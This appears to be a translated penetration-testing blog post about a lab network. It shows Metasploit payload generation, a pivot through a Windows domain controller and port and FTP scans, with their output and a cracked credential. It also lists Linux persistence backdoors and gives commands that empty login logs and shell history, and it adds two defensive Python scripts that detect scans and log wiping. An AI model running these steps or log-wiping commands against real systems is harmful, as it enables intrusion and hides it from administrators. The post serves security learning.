Penetration testing series - Local 1 - internal network testing - step 3: internal scanning, host discovery phase + penetrating the internal service host CentOS 7

The plan is to practise on four penetration examples (two local, two real), working through the techniques and the detail problems encountered before and now, one by one.

Local 1: web testing + internal network testing
Local 2: web testing, ten-odd classic web vulnerability PoCs
Real 1: web testing (medium/low)
Real 2: web + internal network testing (fairly low)

Local 1: web-test host win7 -> win12 domain controller -> centos7 server

This post is step 3 of the internal network testing for Local 1: the win7 and win12 hosts taken during Local 1's web testing are used as a two-hop pivot to penetrate the internal service host centos7.

win7 and win12 are on the 118 segment.

win12 and centos7 are both on the 142 segment.

I. Obtaining a session in msf and pivoting
II. Scanning with msf
III. Post-exploitation information gathering on the Linux host
IV. Privilege escalation on the Linux host
V. Post-exploitation persistence on the Linux host
VI. Cleaning traces on the Linux host

I. Obtaining a session in msf and pivoting

1. Generate a trojan on Kali, upload it to win12 and have it listen locally, so that Kali can connect to it remotely

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=0.0.0.0 LPORT=8899 -f exe > bendi127.exe

2. Try to connect to it from the local machine (the handler PAYLOAD must match the payload msfvenom was given)

use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.118.130
set RPORT 8899

msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.118.130:8899
[*] Sending stage (179779 bytes) to 192.168.118.130
[*] Meterpreter session 2 opened (192.168.118.128-192.168.118.131:0 -> 192.168.118.130:8899) at 2019-09-21 14:24:40 +0800

msf5 exploit(multi/handler) > sessions -l

Active sessions

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows root-PC\Administrator @ ROOT-PC 192.168.118.128:8999 -> 192.168.118.131:49412 (192.168.118.131)
2 meterpreter x86/windows TEST\administrator @ WIN-GU9SGOKTM58 192.168.118.128-192.168.118.131:0 -> 192.168.118.130:8899 (192.168.118.130)

msf5 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2…

meterpreter > getuid
Server username: TEST\administrator

3. Add the route

run post/multi/manage/autoroute

II. Scanning with msf

CentOS has 5 services enabled:

systemctl start named
systemctl start sshd
systemctl start httpd
systemctl start vsftpd
systemctl start smb

1. Scan the ports first

SYN scanning has a drawback here: run the scan too many times and it effectively becomes a SYN DoS against the target.

msf5 > use auxiliary/scanner/portscan/syn 
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.142.130
rhosts => 192.168.142.130
msf5 auxiliary(scanner/portscan/syn) > set threads 100
threads => 100
msf5 auxiliary(scanner/portscan/syn) > set ports 1-10000
ports => 1-10000
msf5 auxiliary(scanner/portscan/syn) > set ports 21,22,23,53,80,8080,139,145,111,7001,3306,1433,1521
ports => 21,22,23,53,80,8080,139,145,111,7001,3306,1433,1521
msf5 auxiliary(scanner/portscan/syn) > run

[+] TCP OPEN 192.168.142.130:21
[+] TCP OPEN 192.168.142.130:22
[+] TCP OPEN 192.168.142.130:53
[+] TCP OPEN 192.168.142.130:80
[+] TCP OPEN 192.168.142.130:111
[+] TCP OPEN 192.168.142.130:139
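From the defender's side, the scan above (one SYN per target port from a single source within a second or two) is exactly the pattern a host firewall log exposes. The Python below is an added example, not from the original post: it runs a sliding-window count of distinct destination ports per source over constructed log lines written in the style of netfilter's LOG target, and flags any source that hits 5 or more ports within 10 seconds. The scanner address 192.168.142.10, the second host 192.168.142.20 and the interface name are assumed; 192.168.142.130 is the CentOS host from the write-up.

```python
import re
from collections import defaultdict, deque

# Constructed sample lines in netfilter LOG style (not from the page). 192.168.142.10
# is an assumed scanner address; 192.168.142.130 is the CentOS host of the write-up.
SAMPLE_LOG = """\
Sep 21 14:30:01 centos7 kernel: IN=ens33 SRC=192.168.142.10 DST=192.168.142.130 PROTO=TCP SPT=41000 DPT=21 SYN
Sep 21 14:30:01 centos7 kernel: IN=ens33 SRC=192.168.142.10 DST=192.168.142.130 PROTO=TCP SPT=41001 DPT=22 SYN
Sep 21 14:30:01 centos7 kernel: IN=ens33 SRC=192.168.142.10 DST=192.168.142.130 PROTO=TCP SPT=41002 DPT=23 SYN
Sep 21 14:30:02 centos7 kernel: IN=ens33 SRC=192.168.142.10 DST=192.168.142.130 PROTO=TCP SPT=41003 DPT=53 SYN
Sep 21 14:30:02 centos7 kernel: IN=ens33 SRC=192.168.142.10 DST=192.168.142.130 PROTO=TCP SPT=41004 DPT=80 SYN
Sep 21 14:30:02 centos7 kernel: IN=ens33 SRC=192.168.142.10 DST=192.168.142.130 PROTO=TCP SPT=41005 DPT=8080 SYN
Sep 21 14:30:02 centos7 kernel: IN=ens33 SRC=192.168.142.10 DST=192.168.142.130 PROTO=TCP SPT=41006 DPT=139 SYN
Sep 21 14:30:03 centos7 kernel: IN=ens33 SRC=192.168.142.10 DST=192.168.142.130 PROTO=TCP SPT=41007 DPT=111 SYN
Sep 21 14:35:10 centos7 kernel: IN=ens33 SRC=192.168.142.20 DST=192.168.142.130 PROTO=TCP SPT=52000 DPT=22 SYN
Sep 21 14:36:10 centos7 kernel: IN=ens33 SRC=192.168.142.20 DST=192.168.142.130 PROTO=TCP SPT=52001 DPT=80 SYN
"""

# Timestamp (HH:MM:SS), source address and destination port of a logged SYN.
LINE_RE = re.compile(
    r"^\w{3}\s+\d+\s+(\d\d):(\d\d):(\d\d).*?SRC=(\S+).*?DPT=(\d+).*?\bSYN\b")


def detect_port_scans(log_text, window=10, threshold=5):
    """Flag sources that send SYNs to >= threshold distinct ports within window seconds.
    Returns a list of (src, first_second_of_window, sorted_ports), one per source."""
    recent = defaultdict(deque)   # src -> deque of (seconds since midnight, dport)
    alerted, alerts = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        hh, mm, ss, src, dport = m.groups()
        now = int(hh) * 3600 + int(mm) * 60 + int(ss)
        q = recent[src]
        q.append((now, int(dport)))
        while q and now - q[0][0] > window:      # drop events outside the window
            q.popleft()
        ports = {p for _, p in q}
        if len(ports) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, q[0][0], sorted(ports)))
    return alerts
```

The second source only touches two ports a minute apart, so it never crosses the threshold; tune `window` and `threshold` to the noise level of the segment being monitored.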

2. ftp

msf5 > use auxiliary/scanner/ftp/
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ftp/bison_ftp_traversal
use auxiliary/scanner/ftp/colorado_ftp_traversal
use auxiliary/scanner/ftp/easy_file_sharing_ftp
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/konica_ftp_traversal
use auxiliary/scanner/ftp/pcman_ftp_traversal
use auxiliary/scanner/ftp/titanftp_xcrc_traversal
msf5 > use auxiliary/scanner/ftp/anonymous


msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.142.130
rhosts => 192.168.142.130
msf5 auxiliary(scanner/ftp/anonymous) > run

[+] 192.168.142.130:21 - 192.168.142.130:21 - Anonymous READ (220 (vsFTPd 3.0.2))
[*] 192.168.142.130:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Result of running auxiliary/scanner/ftp/ftp_login against the same host (the commands that set its options were not captured in the write-up):

[+] 192.168.142.130:21 - 192.168.142.130:21 - Login Successful: alice:123456
[*] 192.168.142.130:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ftp/ftp_login) >

3. ssh

msf5 > use auxiliary/scanner/ssh/
use auxiliary/scanner/ssh/apache_karaf_command_execution
use auxiliary/scanner/ssh/cerberus_sftp_enumusers
use auxiliary/scanner/ssh/detect_kippo
use auxiliary/scanner/ssh/eaton_xpert_backdoor
use auxiliary/scanner/ssh/fortinet_backdoor
use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/karaf_login
use auxiliary/scanner/ssh/libssh_auth_bypass
use auxiliary/scanner/ssh/ssh_enumusers
use auxiliary/scanner/ssh/ssh_identify_pubkeys
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_login_pubkey
use auxiliary/scanner/ssh/ssh_version

4. smb


msf5 > use auxiliary/scanner/smb/
use auxiliary/scanner/smb/impacket/dcomexec
use auxiliary/scanner/smb/impacket/secretsdump
use auxiliary/scanner/smb/impacket/wmiexec
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/psexec_loggedin_users
use auxiliary/scanner/smb/smb1
use auxiliary/scanner/smb/smb2
use auxiliary/scanner/smb/smb_enum_gpp
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumusers_domain
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/smb_version

III. Post-exploitation information gathering on the Linux host

(Figure: see https://blog.csdn.net/weixin_39997829/article/details/79873423)

IV. Privilege escalation on the Linux host

See my own post: http://www.naivete.online/linux%e6%8f%90%e6%9d%83%e5%92%8cwindows%e6%8f%90%e6%9d%83%ef%bc%88%e4%ba%8c%ef%bc%89/

Exploits, scheduled tasks, SUID binaries, etc.

V. Post-exploitation persistence on the Linux host

See my own post: http://www.naivete.online/%e5%90%8e%e6%b8%97%e9%80%8f-linux%e6%9d%83%e9%99%90%e7%bb%b4%e6%8c%81/

1. Port reuse
2. Backdoor via a preloaded malicious shared library on Linux
3. Process injection
4. strace backdoor
5. ssh backdoor
6. suid backdoor
7. vim backdoor

VI. Cleaning traces on the Linux host

References:

https://blog.csdn.net/menghuanbeike/article/details/78949483
https://blog.csdn.net/qq_33020901/article/details/82894353
https://www.lshack.cn/661/

Web logs and system logs, including the login logs among the system logs; for now I haven't thought of more traces to clean: clean up whatever you used.

Login logs (the space + command trick was genuinely new to me):

last    command, log file /var/log/wtmp: users who logged in successfully
lastb   command, log file /var/log/btmp: attempted logins
lastlog command, log file /var/log/lastlog: most recent login information

Empty the log files:
echo > /var/log/wtmp
echo > /var/log/btmp
echo > /var/log/lastlog

Clear the Bash history
Bash can be told not to save a command when it is run:

$ <space> command

i.e. put a space in front of the command to be run.

Clear the history of the current login session:

$ history -r

Clear all history:

$ history -cw
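From the defender's side, emptying the login logs is itself an artefact: on x86_64 Linux, wtmp and btmp are binary files made of fixed 384-byte utmp records, so a file of 0 bytes, or the 1-byte file that `echo > /var/log/wtmp` leaves behind, cannot be a valid log. The Python below is an added example (not from the original post) that decodes constructed wtmp data and flags such tampering; the record layout assumes glibc's struct utmp on x86_64, and the user, host and timestamp in the sample record are made up.

```python
import struct

# glibc struct utmp on x86_64 Linux: 384 bytes per record (see <utmp.h>). Fields:
# ut_type, 2 pad bytes, ut_pid, ut_line, ut_id, ut_user, ut_host, ut_exit (2 shorts),
# ut_session, ut_tv (sec, usec), ut_addr_v6, reserved.
UTMP_FMT = "<h2xi32s4s32s256shhiii16s20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384
USER_PROCESS = 7                        # ut_type for a normal user login


def pack_record(ut_type, pid, line, user, host, ts):
    """Build one utmp record (used here only to construct sample data)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, ts, 0, b"\0" * 16)


def audit_utmp(data):
    """Check raw wtmp/btmp bytes for signs of wiping and decode the records.
    Returns (findings, records); findings is empty for a structurally sound file."""
    findings, records = [], []
    if len(data) == 0:
        findings.append("file is empty: possible truncation")
    elif len(data) % UTMP_SIZE:
        findings.append(f"size {len(data)} is not a multiple of {UTMP_SIZE}: "
                        "file was overwritten (e.g. 'echo > file' leaves 1 byte)")
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({
            "type": f[0], "pid": f[1],
            "line": f[2].rstrip(b"\0").decode(errors="replace"),
            "user": f[4].rstrip(b"\0").decode(errors="replace"),
            "host": f[5].rstrip(b"\0").decode(errors="replace"),
            "time": f[9],
        })
    return findings, records


# Constructed sample data (not from the page): one ordinary login record, and the
# 1-byte remnant that 'echo > /var/log/wtmp' leaves behind.
GOOD_WTMP = pack_record(USER_PROCESS, 1234, "pts/0", "alice", "192.168.142.10", 1569047040)
WIPED_WTMP = b"\n"

if __name__ == "__main__":
    for name, blob in (("good", GOOD_WTMP), ("wiped", WIPED_WTMP)):
        findings, records = audit_utmp(blob)
        print(name, findings or "ok", [r["user"] for r in records])
```

On a live system the same check can be run over the bytes of /var/log/wtmp and /var/log/btmp; /var/log/lastlog uses a different, per-user record layout and is not covered here.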

2019.9.21
